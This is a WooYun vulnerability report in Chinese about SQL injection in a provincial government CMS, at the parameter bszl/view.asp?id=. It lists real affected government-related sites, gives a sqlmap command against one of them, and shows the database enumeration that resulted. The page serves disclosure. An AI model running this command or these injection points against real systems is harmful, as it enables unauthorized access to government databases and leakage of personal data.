当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
漏洞标题:
某省政务类cms存在SA权限注射全库泄露
相关厂商:
漏洞作者:
提交时间:
2014-12-07 19:22
修复时间:
2015-03-07 19:24
公开时间:
2015-03-07 19:24
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
20
漏洞状态:
未联系到厂商或者厂商积极忽略
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:

>

漏洞详情

披露状态:

2014-12-07: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-03-07: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

某省政务类cms存在SA权限注射全库泄露

详细说明:

某省级政务类cms存在注射导致管理员账户及个人信息沦陷
某省政务类cms存在SA权限注射全库泄露(影响该省大量政府网站)
cms官方网站:http://www.rhxwl.com/Server.asp
注射文件为:bszl/view.asp?id=
射点为:
http://www.sxpjgtmyjj.com/bszl/view.asp?id=6900
http://jh.zjmy.net/bszl/view.asp?id=6900
http://xc.xsunion.com/bszl/view.asp?id=6900
http://www.xsunion.com/bszl/view.asp?id=6900
sqlmap.py -u "http://xc.xsunion.com/bszl/view.asp?id=6900" --dbs
available databases [18]:
[*] ")\X13"
[*] "\T\X11"
[*] "QS_CBADM\X02"
[*] bLAPSYS
[*] CTXSYS
[*] FYZXQY
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CS
[*] QS_ES
[*] QS_OS
其他案例:
http://www.yhmyjj.com/
http://www.jjmyjj.com/
http://www.hyqmyjj.com/
http://jh.zjmy.net/
http://www.sxpjgtmyjj.com/
http://www.sxkfqjj.com/

漏洞证明:

修复方案:

版权声明:转载请注明来源 辣条@乌云


>

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝